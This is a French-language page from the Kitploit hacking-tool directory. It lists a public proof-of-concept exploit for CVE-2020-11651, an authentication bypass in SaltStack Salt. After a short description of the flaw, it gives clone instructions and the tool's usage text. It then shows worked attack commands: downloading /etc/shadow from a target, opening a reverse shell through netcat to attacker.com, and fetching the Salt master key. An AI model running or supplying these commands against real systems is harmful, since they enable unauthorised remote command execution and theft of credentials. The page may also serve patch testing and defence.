Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xc0d/cve-2020-11651
Analyse des VulnérabilitésExploitationExfiltration de DonnéesTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: Preuve de Concept

Voir le dépôt
40142il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-11651

Un problème a été découvert dans SaltStack Salt avant les versions 2019.2.4 et 3000 avant 3000.2. La classe ClearFuncs du processus salt-master ne valide pas correctement les appels de méthodes. Cela permet à un utilisateur distant d'accéder à certaines méthodes sans authentification. Ces méthodes peuvent être utilisées pour récupérer les jetons utilisateur du salt master et/ou exécuter des commandes arbitraires sur les minions salt.

Détails

Correctifs pour les versions non supportées de salt

Installation

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Utilisation

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

Exemple

Télécharger le fichier shadow

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

Lancer un shell inversé

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

Récupérer la clé

root@kitploit:~
./PoC.py --host target.com --fetch-key-only
Télécharger l’outil